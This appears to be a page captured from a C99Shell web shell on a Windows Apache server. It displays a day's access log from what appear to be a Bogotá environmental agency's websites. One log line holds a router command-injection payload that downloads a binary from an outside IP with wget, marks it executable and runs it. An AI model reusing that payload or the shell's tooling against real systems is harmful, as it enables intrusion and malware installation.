!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.11.29.log (8.22 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
66.249.66.19 - - [29/Nov/2023:00:00:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201801%20AL%201900/RESOLUCION%201836%20DE%202007.pdf HTTP/1.1" 200 65088
172.22.2.4 - - [28/Nov/2023:23:58:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53356
66.249.66.19 - - [29/Nov/2023:00:00:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8325.pdf HTTP/1.1" 200 363380
66.249.66.19 - - [29/Nov/2023:00:00:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203001%20AL%203100/RESOLUCION%203014%20DE%202007.pdf HTTP/1.1" 200 1170012
66.249.66.20 - - [29/Nov/2023:00:01:37 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/2935.pdf HTTP/1.1" 200 735570
201.245.192.253 - - [29/Nov/2023:00:01:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
216.245.221.92 - - [29/Nov/2023:00:02:09 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [29/Nov/2023:00:04:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5764.pdf HTTP/1.1" 200 300278
172.22.2.4 - - [29/Nov/2023:00:03:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.21 - - [29/Nov/2023:00:05:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201801%20AL%201900/RESOLUCION%201881%20DE%202007.pdf HTTP/1.1" 200 384746
91.92.244.53 - - [29/Nov/2023:00:05:46 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
172.22.2.4 - - [29/Nov/2023:00:04:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56634
66.249.66.19 - - [29/Nov/2023:00:06:42 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/3195.pdf HTTP/1.1" 200 378436
201.245.192.253 - - [29/Nov/2023:00:06:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
191.156.54.174 - - [29/Nov/2023:00:07:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31940
191.156.54.174 - - [29/Nov/2023:00:07:13 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
216.245.221.92 - - [29/Nov/2023:00:07:29 -0500] "GET / HTTP/1.1" 200 319
66.249.66.19 - - [29/Nov/2023:00:10:41 -0500] "GET /BLA/resoluciones/AUTOS%202007/0077.pdf HTTP/1.1" 200 47848
172.22.2.4 - - [29/Nov/2023:00:09:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:00:11:02 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Nov/2023:00:11:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
172.22.2.4 - - [29/Nov/2023:00:10:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55399
216.245.221.92 - - [29/Nov/2023:00:12:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:00:15:07 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 200 1416322
201.245.192.253 - - [29/Nov/2023:00:16:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41651
201.245.192.253 - - [29/Nov/2023:00:16:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42283
66.249.66.13 - - [29/Nov/2023:00:16:43 -0500] "GET /BLA/resoluciones/AUTOS%202018/2511.pdf HTTP/1.1" 200 333967
201.245.192.253 - - [29/Nov/2023:00:16:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
172.22.2.4 - - [29/Nov/2023:00:15:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Nov/2023:00:16:58 -0500] "GET /BLA/resoluciones/Autos%202008/2873.pdf HTTP/1.1" 200 228656
66.249.66.11 - - [29/Nov/2023:00:17:21 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/4742.pdf HTTP/1.1" 200 333345
216.245.221.92 - - [29/Nov/2023:00:17:29 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [29/Nov/2023:00:17:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/RESOLUCION%20311%20DE%202001.pdf HTTP/1.1" 200 398777
172.22.2.4 - - [29/Nov/2023:00:15:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58644
191.156.49.105 - - [29/Nov/2023:00:18:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 22858
66.249.66.12 - - [29/Nov/2023:00:19:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1355.pdf HTTP/1.1" 200 939282
201.245.192.253 - - [29/Nov/2023:00:19:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41651
201.245.192.253 - - [29/Nov/2023:00:21:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
216.245.221.92 - - [29/Nov/2023:00:22:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:00:20:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Nov/2023:00:22:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42283
66.249.66.19 - - [29/Nov/2023:00:23:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4024.pdf HTTP/1.1" 200 297537
172.22.2.4 - - [29/Nov/2023:00:21:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61018
111.202.101.14 - - [29/Nov/2023:00:23:31 -0500] "GET /robots.txt HTTP/1.1" 404 1018
49.7.20.28 - - [29/Nov/2023:00:23:32 -0500] "GET /robots.txt HTTP/1.1" 404 1018
49.7.20.28 - - [29/Nov/2023:00:23:33 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.21 - - [29/Nov/2023:00:24:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2803.pdf HTTP/1.1" 200 541315
181.53.96.80 - - [29/Nov/2023:00:25:01 -0500] "GET /kwssiamovil/sm/des/cjson/pre?f=5&x=U2FsdGVkX19vpnVF0nGKqtyvKUUNkEhKq88669L91bXFJyEn1vsy1xIOXVn/GyYw HTTP/1.1" 200 96695
201.245.192.253 - - [29/Nov/2023:00:26:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41651
201.245.192.253 - - [29/Nov/2023:00:26:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42283
201.245.192.253 - - [29/Nov/2023:00:26:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
216.245.221.92 - - [29/Nov/2023:00:27:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:00:26:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:00:27:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58294
201.245.192.253 - - [29/Nov/2023:00:29:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41651
66.249.66.20 - - [29/Nov/2023:00:30:32 -0500] "GET /resoluciones/RESOLUCIONES%202008/1042.pdf HTTP/1.1" 404 1018
66.249.66.19 - - [29/Nov/2023:00:31:33 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/3352.pdf HTTP/1.1" 200 360131
201.245.192.253 - - [29/Nov/2023:00:31:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
66.249.66.20 - - [29/Nov/2023:00:31:49 -0500] "GET /BLA/resoluciones/AUTOS%202008/0518.pdf HTTP/1.1" 200 226931
66.249.66.23 - - [29/Nov/2023:00:32:04 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202018/1129.pdf HTTP/1.1" 200 265182
216.245.221.92 - - [29/Nov/2023:00:32:29 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Nov/2023:00:32:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42283
172.22.2.4 - - [29/Nov/2023:00:33:20 -0500] "GET /BLA/boletinlegal/dns-query?dns=k30BAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ HTTP/1.1" 406 -
172.22.2.4 - - [29/Nov/2023:00:32:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:00:33:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58644
66.249.66.21 - - [29/Nov/2023:00:35:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1966.pdf HTTP/1.1" 200 544761
201.245.192.253 - - [29/Nov/2023:00:36:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41651
201.245.192.253 - - [29/Nov/2023:00:36:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42283
201.245.192.253 - - [29/Nov/2023:00:36:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
216.245.221.92 - - [29/Nov/2023:00:37:29 -0500] "HEAD / HTTP/1.1" 200 -
20.240.13.252 - - [29/Nov/2023:00:38:32 -0500] "GET /Publicaciones/2023EE243476.pdf HTTP/1.1" 404 228
52.167.144.225 - - [29/Nov/2023:00:39:20 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
52.167.144.225 - - [29/Nov/2023:00:39:49 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
157.55.39.10 - - [29/Nov/2023:00:39:52 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
52.167.144.145 - - [29/Nov/2023:00:39:53 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
52.167.144.145 - - [29/Nov/2023:00:39:54 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
52.167.144.145 - - [29/Nov/2023:00:39:54 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
52.167.144.145 - - [29/Nov/2023:00:39:54 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
201.245.192.253 - - [29/Nov/2023:00:39:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41651
157.55.39.10 - - [29/Nov/2023:00:40:02 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
157.55.39.10 - - [29/Nov/2023:00:40:02 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [29/Nov/2023:00:38:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:00:40:17 -0500] "POST /BLA/boletinlegal/dns-query HTTP/1.1" 406 -
172.22.2.4 - - [29/Nov/2023:00:39:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53356
66.249.66.19 - - [29/Nov/2023:00:40:59 -0500] "GET /Publicaciones/2023EE193019.pdf HTTP/1.1" 404 228
168.119.253.61 - - [29/Nov/2023:00:41:26 -0500] "GET / HTTP/1.1" 200 319
168.119.253.61 - - [29/Nov/2023:00:41:28 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [29/Nov/2023:00:41:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
216.245.221.92 - - [29/Nov/2023:00:42:29 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Nov/2023:00:42:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42283
185.224.128.160 - - [29/Nov/2023:00:43:58 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.146.26%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
123.126.50.154 - - [29/Nov/2023:00:45:47 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Nov/2023:00:44:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Nov/2023:00:46:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
172.22.2.4 - - [29/Nov/2023:00:45:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52827
216.245.221.92 - - [29/Nov/2023:00:47:29 -0500] "HEAD / HTTP/1.1" 200 -
31.13.127.11 - - [29/Nov/2023:00:47:32 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
201.245.192.253 - - [29/Nov/2023:00:51:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
172.22.2.4 - - [29/Nov/2023:00:50:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Nov/2023:00:52:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:00:50:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59007
201.245.192.253 - - [29/Nov/2023:00:56:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
216.245.221.92 - - [29/Nov/2023:00:57:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:00:55:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [29/Nov/2023:00:57:52 -0500] "GET /Publicaciones/2023EE225772.pdf HTTP/1.1" 404 228
172.22.2.4 - - [29/Nov/2023:00:56:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58294
201.245.192.253 - - [29/Nov/2023:01:01:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
172.22.2.4 - - [29/Nov/2023:01:02:09 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
216.245.221.92 - - [29/Nov/2023:01:02:29 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.194 - - [29/Nov/2023:01:02:56 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
172.22.2.4 - - [29/Nov/2023:01:01:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:01:02:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53737
69.171.251.13 - - [29/Nov/2023:01:06:27 -0500] "GET /secretaria-de-ambiente-y-car-firman-el-plan-de-manejo-ambiental-del-sitio-ramsar-complejo-de-humedales-urbanos-de-bogota-unico-en-america-latina.html HTTP/1.1" 200 1040
201.245.192.253 - - [29/Nov/2023:01:06:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
173.252.83.5 - - [29/Nov/2023:01:07:09 -0500] "GET /secretaria-de-ambiente-y-car-firman-el-plan-de-manejo-ambiental-del-sitio-ramsar-complejo-de-humedales-urbanos-de-bogota-unico-en-america-latina.html HTTP/1.1" 200 1040
216.245.221.92 - - [29/Nov/2023:01:07:29 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.191 - - [29/Nov/2023:01:08:46 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/inforgrafia-agua-12x50.jpg HTTP/1.1" 200 1142
54.242.241.88 - - [29/Nov/2023:01:08:56 -0500] "GET /galeria/galeria/fotos/mirador4P.jpg HTTP/1.1" 200 11757
172.22.2.4 - - [29/Nov/2023:01:07:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:01:08:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60634
54.242.241.88 - - [29/Nov/2023:01:10:39 -0500] "GET /galeria/galeria/fotos/mirador4P.jpg HTTP/1.1" 200 11757
186.84.22.187 - - [29/Nov/2023:01:11:12 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89855
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Logo-Ambientic.png HTTP/1.1" 200 22941
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-pa%CC%81gina-de-nin%CC%83os5.jpg HTTP/1.1" 200 33413
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/imagenes-con-marcos-pa%CC%81gina-de-nin%CC%83os-parque-los-nevados.jpg HTTP/1.1" 200 48675
186.84.22.187 - - [29/Nov/2023:01:11:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
201.245.192.253 - - [29/Nov/2023:01:11:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
186.84.22.187 - - [29/Nov/2023:01:11:37 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Recorrido-Aula-Mirador-de-los-Nevados.mp4 HTTP/1.1" 206 3504318
207.46.13.116 - - [29/Nov/2023:01:11:38 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12732
216.245.221.92 - - [29/Nov/2023:01:12:29 -0500] "HEAD / HTTP/1.1" 200 -
172.105.128.11 - - [29/Nov/2023:01:12:59 -0500] "\x16\x03\x01" 400 226
52.167.144.234 - - [29/Nov/2023:01:13:24 -0500] "GET /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
52.167.144.234 - - [29/Nov/2023:01:13:25 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12410
185.191.171.6 - - [29/Nov/2023:01:15:02 -0500] "GET /robots.txt HTTP/1.1" 404 1035
85.208.96.202 - - [29/Nov/2023:01:15:02 -0500] "GET /portaldeninos/corresponsal-ambiental/ HTTP/1.1" 200 93768
66.249.66.20 - - [29/Nov/2023:01:15:04 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1031.pdf HTTP/1.1" 200 1878764
172.22.2.4 - - [29/Nov/2023:01:13:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Nov/2023:01:14:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60634
66.249.66.21 - - [29/Nov/2023:01:16:19 -0500] "GET /BLA/resoluciones/AUTOS%202017/1497.pdf HTTP/1.1" 200 681040
201.245.192.253 - - [29/Nov/2023:01:16:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41151
201.245.192.253 - - [29/Nov/2023:01:16:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42150
201.245.192.253 - - [29/Nov/2023:01:16:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
186.102.58.34 - - [29/Nov/2023:01:17:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/4/TGviUEMaWH3c9bM1SSLC1D8GGV79+D1WwQTyMGryjyttQMbTO5JmKeEfL11rWCziPqhIN50uwk6qUDlrgQkwxT1RhIZ99sZiHlM66YkPSwe2Cb7Xdc8RBY4LJwFKbNSPHsA+/Mbyp7CCq6TMfALc+faroEZlkckSjXv9eSMs8vg8wgV3LQ8DcvDUVMJNt5jnUQbtAUNY1lk1pAxyLBYY85IQmcaljBUNvPsnfsv47u5ZRqJ+w196p6n7g410cFt+/wj03DX/Q==&u=U2FsdGVkX189vLuIAzy6KFl6a2W6S4wwd+lZH2lA5xJSnBh+yCEYOgxXToT0kZVf&y=U2FsdGVkX1+ErCKI3DlqnB7TA0466d7WSSXbFumnh/xSXOxO2LaxqCcPIgaoBOXa HTTP/1.1" 200 26
186.102.58.34 - - [29/Nov/2023:01:17:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18XVa055C+wAvdS7Gx+Ras20J6u1RcGEVB5I5Yvq4aPP0wqcgihd9LgCl8QXw02MkUl/a7ul7f+dhKv47EpDV+1Fjjg7DpEkQAbcyKXAgr8nNA4yXxnMfPsxfZEs6B7x0/HVWTgy56YoTUR7CvwiVAupmB2nRvw6tlG37cdl20oEKpxJSOunPTN5fI3SeVNL8QSVNusw7twy4Hg0SutD8gG8prQZ4k7dav1j78wARlZC3KQQXqGVMj/mgq9prqKBXNdS6q/ularxyrgipXBAWRvNo/I+p1GUwuhYbmL+v0rO8RN5hk1EhZVFWxepuFwfaxNy/pAugnFCBg5PgdVYs1iAFOZ6NvWkPTxpRKyk9CQOoSZFWP8uLoBQH39QraxA8VmchyXvYSNsL4Ih1BkNRMhzBm/TlXQay8yCi+O93uN7c9Z6xVhisygDIKTEvrLm/sEm89B+mK8b/KIHvpTrh28nNo3P8rkJrGJFnC1TP3iQvOHRz0ZSAhqnBvNOCQ6VtPgv4tbQYgA3h0z/3mNoK2KK9VAqNqm/ram1r/fOlTjwlfTQa7iJpIzsgK+0cbnxIHLmHg6V0YF5UK61InYH00+KNNU1o+RujiwXoIKMw9tb49d6hHcipv6w95Ehrhwfs70REn81ScAf1PXr5syIXuiv7gMviajruZPRHWbl4+AULJlAcyDlFMpDbfBd+Lc+KmyGhYybpHIUkqNarejXSJk18ODHsAototrumWFDtwLHTi6pf4s5CBK1Ajq4a8o+kIv342HuZuwycB7mD/dec0F8sSmb6NTElBk0yAib8u2x/T/uTNSFNrSk9CXcbXTFnMIkq0Z2jMgpBMDk62bb0k1eKLkL45D3OYpGpxWhVMvx3Gg88fLBu0IVRo5Eqz7VJ4nmpPB/yZFiQl5X/U8J6YJLTppxADMS8I9EnviJ9/YJLa/m2hikQ0dyBFkcmamCno4pgtmAAf9j+5UW+TBcFfIAwOvNjNszNdgD0h3Uir42SudQI0Vd3CyQxWhcGgMOlV9Cdz1cTMgX5RzxYmI/b36yE5+MkEe4JnTfDdh1sIRmihoBtz/K4f4L6nglo7cn1EdHTHo1sVuARlf7IaMEwIDeC/H4e7f7aV1tEedZ+6VQwHtR9a8kqB3O3vPbqVJy3ZjcmdfCp35SNOuk8X5+J25oMc5Yq+I4DKHAEUHOgwW3YA9nDE+XHtX9r574Y3jv1HGY0CqFGrvGPkDukW0LfN5ZOl0KMexzpwXX+MVAi8M8eYkIMycH5BOKpZD/oGVu0Bam/9Tz/5JfgTLer/HAaCCPLWfCeCSsdVt5WSoIYKPMWsLQELFbrHewUeUoZ1jgngVv/07OEStt7YOiPEiLiLmpZPEwUuIVVnyW88OUf+fM8Cm+6ABltgEyqrpMhji0H+3RN4D8+olmpvowYKtdPvz2FbCdNu2ZjyV46X8omr5qUsCQlbMrDtw000C2Eo+2TXnKF2EAwmsS02Rfn9MdVoOwrDZdSRvIahY28Xbe+HQe7HZfh3Qo+Q1zhpS7hp7S9DOPPljKcgRAfT6ZobmZouRJ3CisdL5liSAuedoDd4C56kEoHBhCVKS7eTqxCME